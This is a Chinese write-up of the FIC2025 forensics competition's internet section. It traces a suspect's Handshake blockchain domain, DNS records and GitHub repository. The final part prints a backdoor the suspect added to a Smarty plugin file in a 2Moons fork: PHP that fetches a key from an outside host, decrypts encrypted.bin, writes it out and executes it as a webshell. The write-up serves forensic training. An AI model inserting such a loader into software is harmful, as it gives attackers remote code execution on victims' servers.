FIC2025预选赛数据分析和互联网部分

路漫漫其修远兮~

知识点总结

1.HNS和以太坊之类的一样，都属于主流区块链项目。对于主流区块链项目都有自己的网站（不同的主流区块链项目通常来说是互不连接的运行在各自的主网上；PS:看来web3要学的真的不少，之前在Ethernaut学的智能合约这场比赛完全派不上用场啊）管理、购买、访问其所属的域名，也就是有着独立地址的DApp，一个地址对应一个域名。而对于HNS，可以通过设置https://hnsdns.com来访问HNS网络上的域名；https://www.namebase.io购买管理HNS域名；

2.多数的区块链项目下的域名都有自己的特点，比如以太坊下面的域名都是.eth为顶级域名；但是HNS支持对于域名的自定义，因为它本身就是专注于去中心化域名解析的

3.Linux的dig命令可以用来查找DNS记录

4.WinMerge可以用于文件夹比较（这一点是010和WinHex没有的）

5.web.archive.org可以查找网页快照

题解

1.请分析检材二，找到李某上游人员陈某博客宣传所用域名为

hlw1

请分析陈某宣传所用域名，该域名的顶级域名在以下那个区块链注册

域名的后缀是foren，是自定义域名，所以大概率是HNS上注册的，去https://www.namebase.io上查确实能查到；

hlw2

3.请分析陈某宣传所用域名的顶级域名的域名解析服务器（DNS）共有几个

由上图，这个网站不仅可以查询到域名记录，还能看到其域名解析服务器，一共2个；

当然在设置HNSDNS之后也可以选择nslookup

4.请分析陈某宣传所用域名的顶级域名的NS1服务器ip为

这里如果用网站就直接查varo顶级域名即可

hlw4

5.请分析陈某宣传所用域名，该域名DNS记录指向邮件服务器域名为

6.请分析陈某宣传所用域名，该域名的txt记录中chen的值为

直接dig它的DNS服务器45.79.133.98即可;

1	dig @45.79.133.98 chen.foren6 ANY

hlw5

请分析陈某宣传所用域名，该域名DNS记录没有以下那个域名

A. admin.chen.foren6

B. caidan.chen.foren6

C. fic.chen.foren6

D. hl.chen.foren6

一个个挖就行,发现只有D是查不到的

hlw7

请分析陈某宣传所用域名，该博客域名最终DNS解析指向的github仓库名为

我们尝试访问chen.foren6，发现会跳转到blog.chen.foren6；挖这个域名，发现有个别名记录，是个GitHub Pages，其地址和仓库名称是一样的

hlw8

9.请分析陈某github账号，陈某对jkroepke/2Moons项目增改了几个文件

根据chen.foren6找到陈某的账号，然后可以看见这里有个2Moons，但是由天干知道，这个东西本来是别人的，可以把原主的和陈某的都下载下来用WinMerge对比一下，除去换行符差异，主要有两处不同：一是添加了encrypted.bin，二是\includes\libs\Smarty\plugins\block.textformat.php多了一段（整理好后如下）

<?php
$a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');
$b=md5($a,true);
$c=file_get_contents('../../../../encrypted.bin');
$d=base64_decode($c);
$e='aes-256-cbc';
$f=openssl_cipher_iv_length($e);
$g=substr($d,0,$f);
$h=substr($d,$f);
$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);
$j=sys_get_temp_dir();
$k=$j.'/func_'.uniqid().'.php';
file_put_contents($k,"<?php\n".$i);
include $k;
unlink($k);
yijuhua();
?>